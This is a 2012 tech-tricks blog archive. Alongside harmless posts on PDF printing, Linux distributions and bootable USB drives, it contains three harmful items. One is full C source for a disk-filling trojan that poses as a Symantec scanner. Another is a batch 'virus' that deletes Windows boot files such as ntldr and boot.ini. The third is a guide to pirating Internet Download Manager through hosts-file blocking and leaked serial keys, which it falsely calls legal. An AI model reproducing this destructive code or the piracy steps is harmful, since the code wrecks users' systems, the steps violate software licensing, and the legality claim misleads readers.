Sunday, October 28, 2012

how to convert anything (word file,power point presentarion,internet page )to pdf

TO CONVERT ANY PRINTABLE FILE INTO PDF YOU NEED A SOFTWARE CALLED BULLZIP.


Features

  • Print to PDF from almost any Windows program.
  • Runs on Microsoft Windows 2000/XP/XP x64/2003/2003 x64/Vista/Vista x64/2008/Windows 7.
  • Supports 64-bit operating systems.
  • Direct output to the same file each time or prompt for destination.
  • Control if the printer should ask if you want to see the resulting PDF document.
  • Control output and prompts programmatically.
  • Setup can run unattended.
  • Graphical user interface.
  • Password protect PDF documents.
  • 128/40 bit encryption.
  • Quality settings (screen, printer, ebook, prepress).
  • Set document properties.
  • Watermark text, size, rotation, and transparency.
  • Superimpose/background documents.
  • Appending/prepending documents.
  • User interface control.
  • Command line interface to all settings.
  • COM/ActiveX interface for programmatic control.
  • Support for Citrix MetaFrame
  • Support for Windows Terminal Server
  • Multiple output types supported: BMP, JPEG, PCX, PDF, PNG, and TIFF.

Download and Installation

The installation of this program is very simple. Just follow the few steps listed here:
  1. Download the latest stable PDF Printer (4.5 MB). 
    Click here to download 
  2. Open the downloaded ZIP file and run the setup program.
When the setup has completed you will have a printer called Bullzip PDF Printer. Now you are ready to print from your other applications.

Saturday, October 27, 2012

How to Make IDM Full Version without Patching


Follow below steps :

1. Make sure you have installed the latest version of IDM if you do not have it you can download it from the official creators website.
2. Now after you have downloaded and installed the latest version just close the IDM and now go to start menu and make a search for Notepad.
3. Now right click on Notepad and than Run It As Administrator.
4. Now navigate to C: > Windows > System 32 > Drivers > etc. > Hosts.
5. When you are in the etc. folder you might not see any files their as you have click on show all files on the right hand side below.
6. Now open the Hosts file and paste all the below lines like in the image.


127.0.0.1    tonec.com
127.0.0.1    www.tonec.com
127.0.0.1    registeridm.com
127.0.0.1    www.registeridm.com
127.0.0.1    secure.registeridm.com
127.0.0.1    internetdownloadmanager.com
127.0.0.1    www.internetdownloadmanager.com
127.0.0.1    secure.internetdownloadmanager.com
127.0.0.1    mirror.internetdownloadmanager.com
127.0.0.1    mirror2.internetdownloadmanager.com


 
 
 
Hosts File
7. So now as you can see in the above image how I have pasted all the lines @ the end of the Hosts file, you have to do same as above, now hit save.
8. Now when you have saved the HOSTS File you can simply enter any serials from below in your IDM Registration page.


RLDGN-OV9WU-5W589-6VZH1
HUDWE-UO689-6D27B-YM28M
UK3DV-E0MNW-MLQYX-GENA1
398ND-QNAGY-CMMZU-ZPI39
GZLJY-X50S3-0S20D-NFRF9
W3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
UVQW0-X54FE-QW35Q-SNZF5
FJJTJ-J0FLF-QCVBK-A287M



9. Now enjoy your full version IDM without purchasing or patching its totally genuine and totally legal, you can update and it will still work like a charm so if you still have any queries than make sure to comment below.

Thursday, October 25, 2012

best small size linux distro Precise Puppy 5.4 Released






Precise Puppy 5.4

check out latest release of Slacko Puppy 5.5 here
October 23, 2012 - The latest version, Precise Puppy 5.4, has been released. It is a new Puppy compatible with Ubuntu Precise Pangolin 12.04.1+ binary DEB packages, see the announcement by Barry Kauler. This will be a Long Term Supported release, following Ubuntu Precise Pangolin's LTS attribute.
Download precise-5.4.iso here or there, size = 157.5 MB 



















Wednesday, October 24, 2012

space eater program that will consume all space in your hard disk


/* SPACE EATER TROJAN. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}

Monday, October 22, 2012

create matrix effect with notepad


create matrix effect with notepad


just follow the steps and see the amazing matrix effect happen in your DOS window:


* Open Notepad.
* Copy the below mentioned text in your notepad file:

@echo off
color 02
:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start

* Save the file with .bat extension like Matrix.bat

Just open the file to see the matrix effect right before your eyes!




Sunday, October 21, 2012

virus that will crash your windows

1.open notepad and copy this code



@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini



and paste it save notepad file to virus.bat

caution: do not run or double click on this file it will crash your system enjoy  :-)

Wednesday, October 17, 2012

open source antivirus


ClamWin is a Free Antivirus program for Microsoft Windows 7 / Vista / XP / Me / 2000 / 98 and Windows Server 2008 and 2003.
ClamWin Free Antivirus is used by more than 600,000 users worldwide on a daily basis. It comes with an easy installer and open source code. You may download and use it absolutely free of charge. It features:
  • High detection rates for viruses and spyware;
  • Scanning Scheduler;
  • Automatic downloads of regularly updated Virus Database.
  • Standalone virus scanner and right-click menu integration to Microsoft Windows Explorer;
  • Addin to Microsoft Outlook to remove virus-infected attachments automatically.

http://www.clamwin.com/content/view/18/46/


download link

Saturday, October 6, 2012

Keyboard LED dancing tricks

Keyboard LED dancing tricks
1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

2. Then save this file as led.vbs (.vbs is must)
3. Open your save file and see your keyboard led blinking like disco lights.

Monday, October 1, 2012

How to Download Google Ebooks Free

To Download Books from Google you need a Tool called Google Book downloader 

for Windows  users.
for Mac users download.


copy and paste the url of your ebooks opened in your Browser as shown above image.





How to install Linux ( Ubuntu , Fedora , Mint , Puppy etc) using USB pen Drive

How to install Linux ( Ubuntu , Fedora , Mint , Puppy etc) using USB pen Drive

Step1. You need a Pen Drive (obviously) at least 2 Gb.

step 2. you need linux operating system image in iso format you can download it from 




step 3. you need a tool to make pen drive bootable 

you can go for linux lili my favorite. 


step 4. install linux lili tool in your system .

step 5. 

working with Tool

(a) choose your USB key.
(b) select linux image from your system.
(c) persistence if you need pen drive for live purpose.
(d) uncheck enable launching linux live directly in windows.
(e) click the lightning button .




step 6. set your USB boot priority First from BIOS by pressing DEL key or F12 depending on your system to enter into bios.




step 7. Reboot system keeping pen drive attached to system.

that's it 





Search This Blog